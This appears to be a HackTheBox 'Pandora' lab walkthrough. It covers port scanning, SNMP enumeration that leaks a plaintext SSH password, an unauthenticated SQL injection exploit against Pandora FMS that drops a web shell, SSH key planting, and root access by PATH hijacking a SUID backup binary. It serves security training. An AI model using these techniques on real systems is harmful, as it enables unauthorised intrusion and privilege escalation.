Pandora - wook413

#hackthebox #linux #easy #pandoraFMS #path_hijacking ![[Pasted image 20250818232308.png]] # Information Gathering - Nmap As always, I started off with scanning all TCP ports. ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ nmap $IP -Pn -n --open --min-rate 3000 -p- Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-19 01:05 UTC Nmap scan report for 10.10.11.136 Host is up (0.069s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http Nmap done: 1 IP address (1 host up) scanned in 16.73 seconds ``` Discovered 2 open ports: 22 and 80. I ran another TCP scan against those two open ports. ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ nmap $IP -sCV -p 22,80 Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-19 01:06 UTC Nmap scan report for 10.10.11.136 Host is up (0.047s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 24:c2:95:a5:c3:0b:3f:f3:17:3c:68:d7:af:2b:53:38 (RSA) | 256 b1:41:77:99:46:9a:6c:5d:d2:98:2f:c0:32:9a:ce:03 (ECDSA) |_ 256 e7:36:43:3b:a9:47:8a:19:01:58:b2:bc:89:f6:51:08 (ED25519) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-title: Play | Landing |_http-server-header: Apache/2.4.41 (Ubuntu) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 8.52 seconds ``` Then I ran UDP scan against top 10 ports ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ nmap $IP -sU --top-ports 10 Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-19 01:07 UTC Nmap scan report for 10.10.11.136 Host is up (0.048s latency). PORT STATE SERVICE 53/udp closed domain 67/udp closed dhcps 123/udp closed ntp 135/udp open|filtered msrpc 137/udp closed netbios-ns 138/udp closed netbios-dgm 161/udp open snmp 445/udp closed microsoft-ds 631/udp closed ipp 1434/udp closed ms-sql-m Nmap done: 1 IP address (1 host up) scanned in 4.85 seconds ``` --- # Enumeration ##### HTTP - TCP 80 The landing page of port 80 looks as follows. It's mentioned multiple times that `Play` is an extension of `panda.htb` across the website. ![[Pasted image 20250818202049.png]] Is it giving me hints that I should map the IP address to `panda.htb` domain? ![[Pasted image 20250818202438.png]] `Gobuster` revealed `/assets` directory but I didn't find anything special inside the directory. ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ gobuster dir -u http://panda.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt =============================================================== Gobuster v3.6 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://panda.htb [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.6 [+] Timeout: 10s =============================================================== Starting gobuster in directory enumeration mode =============================================================== /assets (Status: 301) [Size: 307] [--> http://panda.htb/assets/] ``` Also I intercepted the request of the message form on the website and tried tweaking parameters but I couldn't find any vulnerabilities there either. ![[Pasted image 20250818203459.png]] # Initial Access - shell as `daniel` ##### SNMP - UDP 161 I could explore deeper on port 80 but I wanted to test port 161 since the output of Nmap tells me SNMP port is open. I found a community string `public` with `onesixtyone` ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ onesixtyone -c /usr/share/seclists/Discovery/SNMP/snmp.txt $IP Scanning 1 hosts, 3219 communities 10.10.11.136 [public] Linux pandora 5.4.0-91-generic #102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64 10.10.11.136 [public] Linux pandora 5.4.0-91-generic #102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64 ``` Then I ran `snmp-check` against the IP with the community string `public` ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ snmp-check $IP -c public -v2c snmp-check v1.9 - SNMP enumerator Copyright (c) 2005-2015 by Matteo Cantoni (www.nothink.org) [+] Try to connect to 10.10.11.136:161 using SNMPv2c and community 'public' [*] System information: Host IP address : 10.10.11.136 Hostname : pandora Description : Linux pandora 5.4.0-91-generic #102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64 Contact : Daniel Location : Mississippi Uptime snmp : 00:56:03.68 Uptime system : 00:55:56.77 System date : 2025-8-19 01:42:07.0 [*] Network information: IP forwarding enabled : no Default TTL : 64 TCP segments received : 329892 TCP segments sent : 333811 TCP segments retrans : 1518 Input datagrams : 337206 Delivered datagrams : 337081 Output datagrams : 336906 ... <SNIP> ``` ![[Pasted image 20250818204447.png]] Among the output of `snmp-check`, in `Processes` section, there were processes that contained a set of credentials in plaintext. `daniel:HotelBabylon23` ![[Pasted image 20250818205042.png]] Because I know port 22 is open, I tried the found credentials against the SSH and they worked. ```bash daniel@pandora:~$ whoami daniel ``` Inside `/home` directory, not only `daniel` but also `matt` directory exists and there's nothing inside `daniel`'s directory. ```bash daniel@pandora:/home$ ls daniel matt ``` So, `user.txt` is in `/home/matt` and current user `daniel` is not able to read it. ```bash daniel@pandora:/home/matt$ ls -la total 24 drwxr-xr-x 2 matt matt 4096 Dec 7 2021 . drwxr-xr-x 4 root root 4096 Dec 7 2021 .. lrwxrwxrwx 1 matt matt 9 Jun 11 2021 .bash_history -> /dev/null -rw-r--r-- 1 matt matt 220 Feb 25 2020 .bash_logout -rw-r--r-- 1 matt matt 3771 Feb 25 2020 .bashrc -rw-r--r-- 1 matt matt 807 Feb 25 2020 .profile -rw-r----- 1 root matt 33 Aug 19 00:47 user.txt daniel@pandora:/home/matt$ cat user.txt cat: user.txt: Permission denied ``` # Lateral Movement - shell as `matt` I searched for files that have SUID bit set to them and this binary file `pandora_backup` caught my eye. ```bash daniel@pandora:/tmp$ find / -type f -perm -4000 2>/dev/null /usr/bin/sudo /usr/bin/pkexec /usr/bin/chfn /usr/bin/newgrp /usr/bin/gpasswd /usr/bin/umount /usr/bin/pandora_backup /usr/bin/passwd /usr/bin/mount /usr/bin/su /usr/bin/at /usr/bin/fusermount /usr/bin/chsh /usr/lib/openssh/ssh-keysign /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/lib/eject/dmcrypt-get-device /usr/lib/policykit-1/polkit-agent-helper-1 ``` I think this can be used after we first obtain user `matt`. This file is not relevant at the moment. ```bash daniel@pandora:/tmp$ ls -l /usr/bin/pandora_backup -rwsr-x--- 1 root matt 16816 Dec 3 2021 /usr/bin/pandora_backup ``` In `/var/www` directory, there was an unusual directory other than `html`, named `pandora`. This indicates that there might be another web service running other than `play` that's running only internally ```bash daniel@pandora:/var/www$ ls html pandora ``` Inside `/etc/apache2/sites-enabled` directory, there are 2 config files. This also backs my theory. ```bash daniel@pandora:/etc/apache2/sites-enabled$ ls 000-default.conf pandora.conf ``` `pandora.conf` file tells us a few important things: - it's only listening on localhost port 80. - The server name is `pandora.panda.htb` - Its `DocumentRoot` is `/var/www/pandora` ```bash daniel@pandora:/etc/apache2/sites-enabled$ cat pandora.conf <VirtualHost localhost:80> ServerAdmin [email protected] ServerName pandora.panda.htb DocumentRoot /var/www/pandora AssignUserID matt matt <Directory /var/www/pandora> AllowOverride All </Directory> ErrorLog /var/log/apache2/error.log CustomLog /var/log/apache2/access.log combined </VirtualHost> ``` ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ ssh daniel@$IP -L 4130:127.0.0.1:80 [email protected]'s password: ``` After `port forwarding` is done, navigating to `127.0.0.1:4130` reveals this `pandora_console` website. Even though I'm able to access the page, I'm going to map the IP address (`127.0.0.1`) to its server name `pandora.panda.htb` ![[Pasted image 20250818214235.png]] ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ echo '127.0.0.1 pandora.panda.htb' | sudo tee -a /etc/hosts [sudo] password for kali: 127.0.0.1 pandora.panda.htb ``` Apparently, the real name of the service is `pandora FMS`. At the bottom of the page, it specifies the version of the service: `v7.0NG.742_FIX_PERL2020` ![[Pasted image 20250818214536.png]] The exploit that matches our version is an RCE but it requires authentication. I do not have a valid set of credentials. ![[Pasted image 20250818215205.png]] I tried `daniel`'s credentials on the login form but it didn't work. However, it returned different error ![[Pasted image 20250818220359.png]] Because now I know RCE requires authentication, I looked for other types of exploits. Then I found this `Github` repository which introduces `SQL Injection` exploit against the same version of `Pandora FMS`. ![[Pasted image 20250818221000.png]] ![[Pasted image 20250818221430.png]] ```bash ┌──(venv)─(kali㉿kali)-[~/Desktop/Pandora_v7.0NG.742_exploit_unauthenticated] └─$ python3 sqlpwn.py -t 127.0.0.1:4130 URL: http://127.0.0.1:4130/pandora_console [+] Sending Injection Payload [+] Requesting Session [+] Admin Session Cookie : ig6lh7nu80ikloack743o95umj [+] Sending Payload [+] Respose : 200 [+] Pwned :) [+] If you want manual Control : http://127.0.0.1:4130/pandora_console/images/pwn.php?test= CMD > whoami matt ``` ```bash matt@pandora:/home/matt$ ls user.txt matt@pandora:/home/matt$ cat user.txt 19b... ``` # Privilege Escalation - shell as `root` `sudo -l` command returns some error that I have never encountered before. ```bash matt@pandora:/home/matt$ sudo -l sudo: PERM_ROOT: setresuid(0, -1, -1): Operation not permitted sudo: unable to initialize policy plugin ``` I already saw earlier that there's `pandora_backup` binary with SUID bit set. ```bash matt@pandora:/home/matt$ find / -type f -perm -4000 2>/dev/null /usr/bin/sudo /usr/bin/pkexec /usr/bin/chfn /usr/bin/newgrp /usr/bin/gpasswd /usr/bin/umount /usr/bin/pandora_backup /usr/bin/passwd /usr/bin/mount /usr/bin/su /usr/bin/at /usr/bin/fusermount /usr/bin/chsh /usr/lib/openssh/ssh-keysign /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/lib/eject/dmcrypt-get-device /usr/lib/policykit-1/polkit-agent-helper-1 ``` It errors and tells me to check permissions when it has SUID bit set. I should be able to run it. ```bash matt@pandora:/home/matt$ pandora_backup PandoraFMS Backup Utility Now attempting to backup PandoraFMS client tar: /root/.backup/pandora-backup.tar.gz: Cannot open: Permission denied tar: Error is not recoverable: exiting now Backup failed! Check your permissions! ``` This creates a set of `public` and `private` keys ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ ssh-keygen -t ed25519 Generating public/private ed25519 key pair. Enter file in which to save the key (/home/kali/.ssh/id_ed25519): Enter passphrase for "/home/kali/.ssh/id_ed25519" (empty for no passphrase): Enter same passphrase again: Your identification has been saved in /home/kali/.ssh/id_ed25519 Your public key has been saved in /home/kali/.ssh/id_ed25519.pub The key fingerprint is: SHA256:G1frXE/h4hzxJAzzAFAUyTHfBejUUegp5LjbnHCYox8 kali@kali The key's randomart image is: +--[ED25519 256]--+ | .=B=+oo=o | | oo+Bo. | | *.o*.o | | . = +* .| | S = oo.o.| | X +o.oo | | oEB +o .| | . ..+ | | .. | +----[SHA256]-----+ ``` Then I copied the public key inside `matt`'s `/home/matt/.ssh/authorized_keys` file. ```bash matt@pandora:/home/matt/.ssh$ ls authorized_keys matt@pandora:/home/matt/.ssh$ cat authorized_keys ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKaFr067ff7fbmns22BPiuWYPz+wi1UWFSMNyMtWouzk wook@wook ``` After adding the public key inside `/.ssh/authorized_keys` file, I logged into SSH server using the private key. ```bash ssh -i id_ed25519 matt@$IP ``` And I got in as `matt` ```bash matt@pandora:~$ whoami matt matt@pandora:~$ id uid=1000(matt) gid=1000(matt) groups=1000(matt) ``` Now when I ran `/usr/bin/pandora_backup`, it ran without any errors. It references `tar` a couple times which indicates it's using `tar` to compress ```bash matt@pandora:~$ pandora_backup PandoraFMS Backup Utility Now attempting to backup PandoraFMS client tar: Removing leading `/' from member names /var/www/pandora/pandora_console/AUTHORS tar: Removing leading `/' from hard link targets /var/www/pandora/pandora_console/COPYING ... <SNIP> ... /var/www/pandora/pandora_console/vendor/egulias/email-validator/composer.json /var/www/pandora/pandora_console/vendor/egulias/email-validator/phpunit.xml.dist /var/www/pandora/pandora_console/vendor/egulias/email-validator/LICENSE /var/www/pandora/pandora_console/ws.php Backup successful! Terminating program! ``` I tried to extract strings from the binary but `strings` is not installed. ```bash matt@pandora:~$ cat /usr/bin/pandora_backup | strings Command 'strings' not found, but can be installed with: apt install binutils Please ask your administrator. ``` So I used `ltrace` instead. `ltrace` drops the SUID bit but we might get an understanding of what it does under the hood. However it crashes because it had dropped the SUID bit and doesn't have permissions to `/root/.backup/pandora-backup.tar.gz`. ```bash matt@pandora:~$ ltrace pandora_backup getuid() = 1000 geteuid() = 1000 setreuid(1000, 1000) = 0 puts("PandoraFMS Backup Utility"PandoraFMS Backup Utility ) = 26 puts("Now attempting to backup Pandora"...Now attempting to backup PandoraFMS client ) = 43 system("tar -cvf /root/.backup/pandora-b"...tar: /root/.backup/pandora-backup.tar.gz: Cannot open: Permission denied tar: Error is not recoverable: exiting now <no return ...> --- SIGCHLD (Child exited) --- <... system resumed> ) = 512 puts("Backup failed!\nCheck your permis"...Backup failed! Check your permissions! ) = 39 +++ exited (status 1) +++ ``` Notice that the binary is using `system` function to call `tar` without specifying the full path. We can abuse this and perform `Path Hijacking` attack. Currently, `$PATH` variable is as follows: ```bash matt@pandora:/tmp$ echo $PATH /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin ``` Now I prepended `/tmp` directory to the `PATH` environment variable. ```bash matt@pandora:/tmp$ export PATH=/tmp:$PATH matt@pandora:/tmp$ echo $PATH /tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin ``` I generated a payload which just simply runs `bash` and its name , of course, is `tar` ![[Pasted image 20250818232026.png]] I executed `pandora_backup` again and it immediately ran `tar` which triggered `/bin/bash` and got me the shell as `root` ```bash matt@pandora:/tmp$ pandora_backup PandoraFMS Backup Utility Now attempting to backup PandoraFMS client root@pandora:/tmp# whoami; id root uid=0(root) gid=1000(matt) groups=1000(matt) ``` Found `root.txt` ```bash root@pandora:/root# ls root.txt root@pandora:/root# cat root.txt 984... ```